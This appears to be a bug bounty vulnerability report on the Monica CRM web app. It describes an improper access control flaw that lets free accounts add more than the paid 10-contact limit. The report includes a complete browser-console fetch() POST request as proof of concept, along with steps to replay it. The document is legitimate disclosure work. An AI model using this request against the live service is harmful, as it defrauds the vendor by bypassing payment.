monica

vulnerability improper access control - generic (cwe-284)
severity 8.8
language php
registry other

✍️ Description

Bypass payment verification and add more contact. From free account user can add only 10 contacts . but using this bug user can add more than 10 contacts for free

🕵️‍♂️ Proof of Concept

  1. First goto https://app.monicahq.com/people from free account and add 10 contacts . Now you cant add more contacts , you need to buy pro account . Now bypass this payment and add more contact using bellow request
await fetch("https://app.monicahq.com/people", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/x-www-form-urlencoded",
        "Upgrade-Insecure-Requests": "1",
        "Pragma": "no-cache",
        "Cache-Control": "no-cache"
    },
    "body": "_token=RO5UHOXKg6GWDtSlSpfcQEFtN4Dpo1cwW3ueFMEa&first_name=user33333&middle_name=&last_name=&nickname=&gender=&save=true",
    "method": "POST",
    "mode": "cors"
});

here change your token in request body and open your browser console and execute above code and see new contact created . Using this bug user can add more than 10 contacts from free account . See bellow video poc

VIDEO POC--->

https://drive.google.com/file/d/1MVnodLp0m21ZQ2zvI5kicqJHlJ0h9mll/view?usp=sharing

💥 Impact

Bypass payment method